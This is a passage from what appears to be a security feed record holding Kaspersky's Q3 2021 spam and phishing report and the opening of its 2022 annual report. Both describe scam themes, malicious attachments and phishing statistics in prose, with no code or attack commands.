releases.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02-1024x452.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03-1024x490.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n"Nigerian prince" scammers also had a close eye on Q3's sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04-1024x429.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05-1024x613.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06-1024x351.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07-1024x661.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of "holiday deals" supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the "promotion" to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08-1024x323.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a "commission" before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09-1024x455.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers' possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1-1024x672.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. As such, this quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded on such platform. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to "pay for legal services relating to form registration". The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which they removed the fraudulent apps.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11-1024x278.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim's account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12-1024x618.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13-1024x534.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14-1024x746.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina's BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15-1024x427.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim's system.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16-1024x352.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17-1024x587.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[![Dynamics of phishing activity on WhatsApp, Q3 2021](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[![Dynamics of phishing activity on Telegram, Q3 2021](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/14165025/sl-email-spam-binary-code-data-abstract-1200-990x400.jpg)\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year's resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the "preview", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01-1024x546.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02-1024x427.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03-1024x413.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost closed. Vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04-1024x474.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05-1024x607.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06-1024x653.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organization to profit from victims' personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were offered to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the "charity" found the victim's telephone number in a database of individuals affected by COVID-19. Those who wished to receive the "aid" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, attaching a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others' personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07-1024x741.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers' interest in wallet owners' accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. By getting the user's secret phrase, cybercriminals could get access to their cryptocurrency balance.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08-1024x748.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)\n\nIn a typical internet hoax manner, crypto scam sites offered visitors to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency \u2014 which they promised to give away and which they were trying to steal. The "giveaways" were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia thirty-year anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the "giveaways". Users were offered to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09-1024x457.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)\n\n### Compensation, bonus, and paid survey scams\n\nBonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that "financial assistance" is frequently promised by con artists to swindle you out of your money.\n\n"Promotional campaigns by major banks" were a popular bait in 2022. Visitors to a fraudulent web page were offered to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30\u201340. The cybercriminals used an array of techniques to lull victims' vigilance: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example, the Polish finance ministry.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10-1024x511.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)\n\nAid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a "Ramadan Relief" program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, whereas observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts\u2014nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. In addition to that, they might ask the victim to cover the "shipping costs".\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11-992x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)\n\nGrowing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide the type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of \u00a3400 was supposed to make the victim drop their guard and share their personal 